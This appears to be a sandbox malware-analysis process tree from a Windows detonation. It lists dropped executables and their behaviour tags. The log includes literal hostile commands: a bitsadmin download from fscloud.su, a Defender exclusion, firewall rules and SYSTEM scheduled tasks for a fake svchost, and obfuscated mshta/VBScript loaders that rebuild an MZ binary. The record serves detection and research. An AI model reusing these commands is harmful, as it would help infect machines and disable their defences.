C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1508 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514838⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515138⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872158⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631198⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942318⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵
-
C:\Users\Admin\AppData\Local\Temp\92-97740-3ca-03eac-420f6e3f85a38\Wofezhaxypi.exe"C:\Users\Admin\AppData\Local\Temp\92-97740-3ca-03eac-420f6e3f85a38\Wofezhaxypi.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exe /eufive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 26010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exeC:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe /qn CAMPAIGN="654"9⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654358 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exeC:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 26010⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Users\Admin\Pictures\Adobe Films\a1sIMMdcjuk0TWWU00B_mdKO.exe"C:\Users\Admin\Pictures\Adobe Films\a1sIMMdcjuk0TWWU00B_mdKO.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7fffd258dec0,0x7fffd258ded0,0x7fffd258dee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60b0a9e70,0x7ff60b0a9e80,0x7ff60b0a9e908⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,12584540835772529798,4965942559173619970,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2728_368073941" --mojo-platform-channel-handle=1720 /prefetch:87⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\7M7Hn4tZ95KaqTur0so4Bmsu.exe"C:\Users\Admin\Pictures\Adobe Films\7M7Hn4tZ95KaqTur0so4Bmsu.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\L69DfgFoAllVllEy2jOxVIeu.exe"C:\Users\Admin\Pictures\Adobe Films\L69DfgFoAllVllEy2jOxVIeu.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\yEIsgJfYOoWfBJEJNEoLkIc8.exe"C:\Users\Admin\Pictures\Adobe Films\yEIsgJfYOoWfBJEJNEoLkIc8.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 2563⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 2044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"C:\Users\Admin\Pictures\Adobe Films\W4ysop1FHYRr_xdZXf7ZCJ_e.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\g8fcyuzFoqvSg8OUP0tHcBoy.exe"C:\Users\Admin\Pictures\Adobe Films\g8fcyuzFoqvSg8OUP0tHcBoy.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\7qn4oO9BoLqPcXPnJsizWxHM.exe"C:\Users\Admin\Pictures\Adobe Films\7qn4oO9BoLqPcXPnJsizWxHM.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 15843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\gG966mdTjMQCGobSA1xfEzb7.exe"C:\Users\Admin\Pictures\Adobe Films\gG966mdTjMQCGobSA1xfEzb7.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\71hdwuYNuZsjLfxrzhnRb4Ls.exe"C:\Users\Admin\Pictures\Adobe Films\71hdwuYNuZsjLfxrzhnRb4Ls.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\N0NCDPohiNjHdlr2B2UqrBcW.exe"C:\Users\Admin\Pictures\Adobe Films\N0NCDPohiNjHdlr2B2UqrBcW.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\27nNpMIlNTg7B__qK3RO47JE.exe"C:\Users\Admin\Pictures\Adobe Films\27nNpMIlNTg7B__qK3RO47JE.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\DKAkDeyF1LExOxO6TrKZ5_B7.exe"C:\Users\Admin\Pictures\Adobe Films\DKAkDeyF1LExOxO6TrKZ5_B7.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\E8b5UKJ6STYQ0e00s7p6lTHo.exe"C:\Users\Admin\Pictures\Adobe Films\E8b5UKJ6STYQ0e00s7p6lTHo.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Users\Admin\Pictures\Adobe Films\ztFLqZo8tsSQFc1wqHeNc22m.exe"C:\Users\Admin\Pictures\Adobe Films\ztFLqZo8tsSQFc1wqHeNc22m.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"C:\Users\Admin\Pictures\Adobe Films\tGPLfmakviwwx8D8QKxJELZ_.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\LLM8p_bDrZ_4l1sMHXmCXrq8.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "LLM8p_bDrZ_4l1sMHXmCXrq8.exe" -F5⤵
- Kills process with taskkill
-
